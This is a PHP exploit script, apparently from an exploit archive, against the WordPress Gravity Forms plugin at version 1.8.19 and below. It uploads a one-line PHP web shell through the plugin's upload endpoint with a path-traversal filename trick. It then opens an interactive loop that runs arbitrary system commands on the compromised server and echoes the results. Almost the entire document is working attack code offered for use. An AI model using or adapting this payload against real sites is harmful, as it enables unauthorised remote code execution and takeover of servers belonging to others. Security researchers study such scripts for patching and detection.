<?php # Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload # Vendor Homepage: http://www.gravityforms.com/ # Vulnerable Version(s): 1.8.19 (and below) # Exploit Author: Abk Khan # Contact: [ an0nguy @ protonmail.ch ] # Website: http://blog.lolwaleet.com/ # Category: webapps # PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability! error_reporting(0); $domain = 'http://localhost/wordpress'; $url = "$domain/?gf_page=upload"; $shell = "$domain/wp-content/_input_3_khan.php5"; $separator = '-----------------------------------------------------'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if (eregi('ok', $response)) { echo "$separator\nShell at $shell\n$separator\n\n"; while ($testCom != 'bubye!') { $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~')); echo "$user@b0x:~$ "; $handle = fopen("php://stdin", 'r'); $testCom = trim(fgets($handle)); fclose($handle); $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n"; echo $comOut; } } else { die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator"); } function get_string_between($string, $start, $end) { # stolen from stackoverflow! $string = " " . $string; $ini = strpos($string, $start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } ?>